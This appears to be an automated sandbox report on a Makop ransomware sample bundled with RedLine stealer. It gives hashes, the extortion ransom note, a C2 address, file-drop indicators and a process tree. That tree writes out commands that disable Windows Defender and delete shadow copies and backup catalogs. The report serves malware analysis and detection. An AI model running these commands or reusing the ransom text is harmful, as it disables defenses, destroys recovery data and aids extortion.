makop | e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152

General

Target

e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
Size

549KB
MD5

0aef3aef127a4f780fc0166e4ed8ebac
SHA1

de5e59cd81f17027d811400bc7d48765e1d55df2
SHA256

e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152
SHA512

1cd35a889aebf12b42b43eb83aa8c224e1896045c37b0f08f89b5910ff55e15bcba9e215f97ead7432dc47796263508906287e184ab9f6c602097f7eb93ce5fa

Score

10^/10

makop redline 10 discovery evasion infostealer ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\Windows\Tasks\readme-warning.txt

Ransom Note

All of your files have been encrypted. Your backup files as well. We have exfiltrated tons of your private data to our servers including data of your clients, dont believe us ? Read on. In order to restore your operations, avoid leaking/selling your data, and keep your business reputation intact, contact us directly on the below TOX ID as soon as possible. 1) TOX Download: https://tox.chat/ 2) TOX ID: 5D935FD670BAEF3EA1938D60B91709D421DE8E21381267A77E16ED0D5FB4E36334304E35A472 3) Install TOX and add the TOX ID in the step 2 4) Share your personal ID over TOX chat (Do not send hello without your personal ID provided below) Upon contacting us, proof will be provided that we can decrypt your data, and samples of exfiltrated confidential information will also be provided. Although its not our intention , if you do not cooperate , we will not hesitate to make your data public including any confidential data , sell to your competitors/bidders , or send your clients their data just to make you look really bad and lose your clients trust , or even worse , being prosecuted for not telling your affected clients that their data has been compromised. Talking to law enforcement will only ensure that you don't get a decryption key and put your business reputation on the line. Attention! - Do not rename encrypted files. - Do not try to decrypt your data using third party software, it may cause permanent data loss. Your personal ID: 570E7D26

URLs

https://tox.chat/

Extracted

Family

redline

Botnet

10

C2

18.191.251.199:45097

Signatures

MAKOP ransomware payload 3 IoCs

Processes:

resource	yara_rule
C:\Windows\Tasks\wmi.exe	family_makop
C:\Windows\Tasks\wmi.exe	family_makop
C:\Windows\Tasks\wmi.exe	family_makop

Makop
Ransomware family discovered by @VK_Intel in early 2020.
ransomware makop
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/892-122-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/892-123-0x0000000000419322-mapping.dmp	family_redline

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

668 wbadmin.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

condition.exewmi.exewmi.exe

pid process

64 condition.exe
2024 wmi.exe
2284 wmi.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
668	wbadmin.exe

pid	process
64	condition.exe
2024	wmi.exe
2284	wmi.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe

description	pid	process	target process
PID 3052 set thread context of 892	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe

Drops file in Program Files directory 64 IoCs

Processes:

wmi.exe

description	ioc	process
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\readme-warning.txt	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\move.scale-180.png	wmi.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml	wmi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-oob.xrm-ms	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\5.jpg	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeAppList.targetsize-32_altform-unplated.png	wmi.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\ja-JP\wmpnssui.dll.mui	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\MedTile.scale-125.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\sg_16x11.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosStoreLogo.png	wmi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_de_135x40.svg	wmi.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\ado\msadox28.tlb	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\je_60x42.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\fb_blank_profile_portrait.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-32.png	wmi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-oob.xrm-ms	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\StarClubTile.Wide.jpg	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\AppxManifest.xml	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\Assets\Logo.png	wmi.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\bg-BG\tipresx.dll.mui	wmi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\BRANDING.XML	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Icons\klondike_menu_icon.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsLargeTile.scale-200.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256_altform-unplated.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\LoadIconRTL_contrast-black.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-125_contrast-white.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-336.png	wmi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_ie8.gif	wmi.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipsfra.xml	wmi.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\readme-warning.txt	wmi.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\readme-warning.txt	wmi.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\readme-warning.txt	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Marble.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-30_altform-unplated.png	wmi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-cn_get.svg	wmi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\EXPTOOWS.XLA	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-60_altform-colorize.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-white\MedTile.scale-100.png	wmi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\ANALYS32.XLL	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\BadgeLogo2.targetsize-36.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-40_altform-fullcolor.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsMedTile.contrast-white_scale-100.png	wmi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main-selector.css	wmi.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Office16\1033\getofficecarousel.dcp	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxAccountsLargeTile.scale-100.png	wmi.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\readme-warning.txt	wmi.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\readme-warning.txt	wmi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\ui-strings.js	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_TR-TR.respack	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5601_24x24x32.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailWideTile.scale-125.png	wmi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office-client15.xrm-ms	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedWideTile.scale-100.png	wmi.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\readme-warning.txt	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\bg4.jpg	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-20_altform-unplated_contrast-black.png	wmi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\vscroll-thumb.png	wmi.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\readme-warning.txt	wmi.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\Attribution\holiday_weather.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Icons\terms_of_use.png	wmi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupWideTile.scale-200.png	wmi.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\TestsRunningInCleanRunspace.Tests.ps1	wmi.exe

Drops file in Windows directory 7 IoCs

Processes:

wmi.exeDism.exee7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe

description	ioc	process
File created	C:\Windows\Tasks\readme-warning.txt	wmi.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File created	C:\Windows\Tasks\wmi.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
File created	C:\Windows\Tasks\SA.abf	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
File created	C:\Windows\Tasks\condition.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
File opened for modification	C:\Windows\Tasks\SA.abf	wmi.exe
File opened for modification	C:\Windows\Tasks\SA.DAT	wmi.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1116 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.execondition.exewmi.exe

pid process

4060 powershell.exe
4060 powershell.exe
4060 powershell.exe
64 condition.exe
64 condition.exe
2024 wmi.exe
2024 wmi.exe

pid	process
1116	vssadmin.exe

pid	process
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
64	condition.exe
64	condition.exe
2024	wmi.exe
2024	wmi.exe

Suspicious use of AdjustPrivilegeToken 52 IoCs

Processes:

e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exee7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exepowershell.execondition.exevssvc.exewbengine.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
Token: SeDebugPrivilege	892	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	64	condition.exe
Token: SeBackupPrivilege	780	vssvc.exe
Token: SeRestorePrivilege	780	vssvc.exe
Token: SeAuditPrivilege	780	vssvc.exe
Token: SeBackupPrivilege	1640	wbengine.exe
Token: SeRestorePrivilege	1640	wbengine.exe
Token: SeSecurityPrivilege	1640	wbengine.exe
Token: SeIncreaseQuotaPrivilege	1952	WMIC.exe
Token: SeSecurityPrivilege	1952	WMIC.exe
Token: SeTakeOwnershipPrivilege	1952	WMIC.exe
Token: SeLoadDriverPrivilege	1952	WMIC.exe
Token: SeSystemProfilePrivilege	1952	WMIC.exe
Token: SeSystemtimePrivilege	1952	WMIC.exe
Token: SeProfSingleProcessPrivilege	1952	WMIC.exe
Token: SeIncBasePriorityPrivilege	1952	WMIC.exe
Token: SeCreatePagefilePrivilege	1952	WMIC.exe
Token: SeBackupPrivilege	1952	WMIC.exe
Token: SeRestorePrivilege	1952	WMIC.exe
Token: SeShutdownPrivilege	1952	WMIC.exe
Token: SeDebugPrivilege	1952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1952	WMIC.exe
Token: SeRemoteShutdownPrivilege	1952	WMIC.exe
Token: SeUndockPrivilege	1952	WMIC.exe
Token: SeManageVolumePrivilege	1952	WMIC.exe
Token: 33	1952	WMIC.exe
Token: 34	1952	WMIC.exe
Token: 35	1952	WMIC.exe
Token: 36	1952	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1952	WMIC.exe
Token: SeSecurityPrivilege	1952	WMIC.exe
Token: SeTakeOwnershipPrivilege	1952	WMIC.exe
Token: SeLoadDriverPrivilege	1952	WMIC.exe
Token: SeSystemProfilePrivilege	1952	WMIC.exe
Token: SeSystemtimePrivilege	1952	WMIC.exe
Token: SeProfSingleProcessPrivilege	1952	WMIC.exe
Token: SeIncBasePriorityPrivilege	1952	WMIC.exe
Token: SeCreatePagefilePrivilege	1952	WMIC.exe
Token: SeBackupPrivilege	1952	WMIC.exe
Token: SeRestorePrivilege	1952	WMIC.exe
Token: SeShutdownPrivilege	1952	WMIC.exe
Token: SeDebugPrivilege	1952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1952	WMIC.exe
Token: SeRemoteShutdownPrivilege	1952	WMIC.exe
Token: SeUndockPrivilege	1952	WMIC.exe
Token: SeManageVolumePrivilege	1952	WMIC.exe
Token: 33	1952	WMIC.exe
Token: 34	1952	WMIC.exe
Token: 35	1952	WMIC.exe
Token: 36	1952	WMIC.exe

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exee7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.execmd.execmd.execondition.execmd.exewmi.execmd.exe

description	pid	process	target process
PID 3052 wrote to memory of 916	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
PID 3052 wrote to memory of 916	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
PID 3052 wrote to memory of 916	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
PID 3052 wrote to memory of 892	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
PID 3052 wrote to memory of 892	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
PID 3052 wrote to memory of 892	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
PID 3052 wrote to memory of 892	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
PID 3052 wrote to memory of 892	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
PID 3052 wrote to memory of 892	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
PID 3052 wrote to memory of 892	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
PID 3052 wrote to memory of 892	3052	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
PID 892 wrote to memory of 604	892	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	cmd.exe
PID 892 wrote to memory of 604	892	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	cmd.exe
PID 892 wrote to memory of 604	892	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	cmd.exe
PID 604 wrote to memory of 1052	604	cmd.exe	cmd.exe
PID 604 wrote to memory of 1052	604	cmd.exe	cmd.exe
PID 604 wrote to memory of 1052	604	cmd.exe	cmd.exe
PID 1052 wrote to memory of 712	1052	cmd.exe	reg.exe
PID 1052 wrote to memory of 712	1052	cmd.exe	reg.exe
PID 1052 wrote to memory of 712	1052	cmd.exe	reg.exe
PID 604 wrote to memory of 1256	604	cmd.exe	reg.exe
PID 604 wrote to memory of 1256	604	cmd.exe	reg.exe
PID 604 wrote to memory of 1256	604	cmd.exe	reg.exe
PID 604 wrote to memory of 4060	604	cmd.exe	powershell.exe
PID 604 wrote to memory of 4060	604	cmd.exe	powershell.exe
PID 604 wrote to memory of 4060	604	cmd.exe	powershell.exe
PID 604 wrote to memory of 2808	604	cmd.exe	Dism.exe
PID 604 wrote to memory of 2808	604	cmd.exe	Dism.exe
PID 604 wrote to memory of 2808	604	cmd.exe	Dism.exe
PID 892 wrote to memory of 64	892	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	condition.exe
PID 892 wrote to memory of 64	892	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	condition.exe
PID 892 wrote to memory of 64	892	e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe	condition.exe
PID 64 wrote to memory of 3664	64	condition.exe	cmd.exe
PID 64 wrote to memory of 3664	64	condition.exe	cmd.exe
PID 64 wrote to memory of 3664	64	condition.exe	cmd.exe
PID 3664 wrote to memory of 2024	3664	cmd.exe	wmi.exe
PID 3664 wrote to memory of 2024	3664	cmd.exe	wmi.exe
PID 3664 wrote to memory of 2024	3664	cmd.exe	wmi.exe
PID 2024 wrote to memory of 2616	2024	wmi.exe	cmd.exe
PID 2024 wrote to memory of 2616	2024	wmi.exe	cmd.exe
PID 2616 wrote to memory of 1116	2616	cmd.exe	vssadmin.exe
PID 2616 wrote to memory of 1116	2616	cmd.exe	vssadmin.exe
PID 2616 wrote to memory of 668	2616	cmd.exe	wbadmin.exe
PID 2616 wrote to memory of 668	2616	cmd.exe	wbadmin.exe
PID 2616 wrote to memory of 1952	2616	cmd.exe	WMIC.exe
PID 2616 wrote to memory of 1952	2616	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
"C:\Users\Admin\AppData\Local\Temp\e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3052

C:\Users\Admin\AppData\Local\Temp\e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
C:\Users\Admin\AppData\Local\Temp\e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
2⤵
PID:916

C:\Users\Admin\AppData\Local\Temp\e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
C:\Users\Admin\AppData\Local\Temp\e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:892

C:\Windows\SysWOW64\cmd.exe
"cmd" /C cmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f & reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true" & dism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet
3⤵
- Suspicious use of WriteProcessMemory
PID:604

C:\Windows\SysWOW64\cmd.exe
cmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
4⤵
- Suspicious use of WriteProcessMemory
PID:1052

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
5⤵
PID:712

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
4⤵
PID:1256

\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\SysWOW64\Dism.exe
dism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet
4⤵
- Drops file in Windows directory
PID:2808

C:\Windows\Tasks\condition.exe
"C:\Windows\Tasks\condition.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:64

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\Tasks\wmi.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3664

C:\Windows\Tasks\wmi.exe
C:\Windows\Tasks\wmi.exe
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2024

C:\Windows\Tasks\wmi.exe
"C:\Windows\Tasks\wmi.exe" n2024
6⤵
- Executes dropped EXE
PID:2284

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:2616

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
7⤵
- Interacts with shadow copies
PID:1116

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
7⤵
- Deletes backup catalog
PID:668

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:780

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\System32\vdsldr.exe
